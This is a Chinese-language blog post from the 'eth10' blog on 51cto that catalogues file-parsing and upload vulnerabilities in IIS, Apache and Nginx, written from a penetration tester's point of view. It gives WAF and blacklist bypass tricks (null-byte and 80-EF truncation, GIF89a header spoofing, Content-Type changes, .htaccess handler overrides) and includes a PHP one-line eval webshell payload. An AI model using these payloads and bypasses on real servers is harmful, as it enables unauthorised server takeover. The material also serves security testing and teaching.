淺談文件解析及上傳漏洞
中國菜刀
在web滲透中,我最期待兩種漏洞,一種是任意命令執行漏洞,如struct2漏洞等;另一種是文件上傳漏洞,因為這兩種漏洞都是獲取服務器權限最快最直接的方法。而對於任意命令執行漏洞,如果是通過內網映射出來的,那麽可能還需要使用不同的手段進行木馬文件上傳,從而獲取webshell,通過webshell進行端口轉發或者權限提升。
文件解析漏洞
解析漏洞主要是一些特殊文件被iis、Apache、Nginx等服務在某種情況下解釋成腳本文件格式並得以執行而產生的漏洞。
iis 5.x/6.0解析漏洞
iis6.0解析漏洞主要有以下三種:
1. 目錄解析漏洞 /xx.asp/xx.jpg
在網站下創建文件夾名字為.asp、.asa的文件夾,其目錄內的任何擴展名的文件都被iis當做asp文件來解析並執行。因此只要攻擊者可以通過該漏洞直接上傳圖片馬,並且可以不需要改後綴名!
2. 文件解析 xx.asp;.jpg
在iis6.0下,分號後面的不被解析,所以xx.asp;.jpg被解析為asp腳本得以執行。
3. 文件類型解析 asa/cer/cdx
iis6.0 默認的可執行文件除了asp還包含這三種asa、cer、cdx。
Apache解析漏洞
Apache對文件的解析主要是從右到左開始判斷並進行解析,如果判斷為不能解析的類型,則繼續向左進行解析,如xx.php.wer.xxxxx將被解析為PHP類型。
IIS 7.0/ Nginx <8.03畸形解析漏洞
在默認Fast-CGI開啟狀況下上傳名字為xx.jpg,內容為:<?PHP fputs(fopen(‘shell.php‘,‘w‘),‘<?php eval($_POST[cmd])?>‘);?>
然後訪問xx.jpg/.php,在這個目錄下就會生成一句話木馬shell.php。
Nginx<8.03空字節代碼執行漏洞
nginx如下版本:0.5., 0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37在使用PHP-FastCGI執行php的時候,URL裏面在遇到%00空字節時與FastCGI處理不一致,導致可以在圖片中嵌入PHP代碼然後通過訪問xxx.jpg%00.php來執行其中的代碼。
另一種Nginx文件漏洞是從左到右進行解析,既可繞過對後綴名的限制,又可上傳木馬文件,因此可以上傳XXX.jpg.php(可能是運氣,也可能是代碼本身問題,但在其他都不能成功的條件下可以試試)。如下:Content-Disposition: form-data; name="userfiles"; filename="XXX.jpg.php"
htaccess文件解析
如果Apache中.htaccess可被執行並可被上傳,那麽可以嘗試在.htaccess中寫入:<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
然後再上傳shell.jpg的木馬,這樣shell.jpg就可被解析為PHP文件了。
操作系統特性解析
由於windows會將文件的後綴中的空格以及點進行過濾,如果遇到是黑名單校驗的,如限制不允許上傳PHP文件,而系統又是windows系統,那麽我們可以上傳xx.php ,或者xx.php.,通過這種方式就可以繞過黑名單檢驗的文件上傳!
文件上傳漏洞
文件頭欺騙漏洞
在一句話木馬前面加入GIF89a,然後將木馬保存為圖片格式,可以欺騙簡單的waf。
filepath漏洞
filepath漏洞主要用來突破服務器自動命名規則,主要有以下兩種利用方式:
1、改變文件上傳後路徑(filepath),可以結合目錄解析漏洞,路徑/x.asp/
2、直接改變文件名稱(都是在filepath下進行修改),路徑/x.asp;.
00截斷
00截斷的兩種利用方式:
1、更改filename,xx.php .jpg,在burpsuit中將空格對應的hex 20改為00
2、更改filename,xx.php%00.jpg,在burpsuit中將%00進行右鍵轉換-url-urldecoder
filetype漏洞
filetype漏洞主要是針對content-type字段,主要有兩種利用方式:
1、先上傳一個圖片,然後將content-type:images/jpeg改為content-type:text/asp,然後對filename進行00截斷,將圖片內容替換為一句話木馬。
2、直接使用burp抓包,得到post上傳數據後,將Content-Type: text/plain改成 Content-Type: image/gif。
iconv函數限制上傳
如果某天你上傳文件發現,不管你上傳什麽文件,上傳後的文件都會自動添加一個.jpg的後綴,那麽我們可以懷疑是否是使用iconv這個函數進行了上傳的限制,此時我們可以使用類似00截斷的方法,但是這裏不是00截斷,二是80-EF截斷,也就是說我們可以修改HEX為80到EF中的某一個來進行截斷,如果真是使用這個函數的話,那麽恭喜你上傳任意文件成功!如上傳一個xx.php ,然後截斷抓包將後面的空格對應的十六進制改為80到EF中的任意一個!
雙文件上傳
再一個文件上傳的地方,右鍵審查元素,首先修改action為完整路徑,然後復制粘貼上傳瀏覽文件(<input ......),這樣就會出現兩個上傳框,第一個上傳正常文件,第二個選擇一句話木馬,然後提交。!參考鏈接
表單提交按鈕
我們有時掃描發現上傳路徑,可是只有一個瀏覽文件,卻沒有提交按鈕,此時我們就需要寫入提交按鈕。
寫入表單:
F12審查元素,在選擇文件表單下面添加提交按鈕代碼。<input type="submit" value="提交" name="xx">
本文出自 “eth10” 博客,請務必保留此出處http://eth10.blog.51cto.com/13143704/1956032
淺談文件解析及上傳漏洞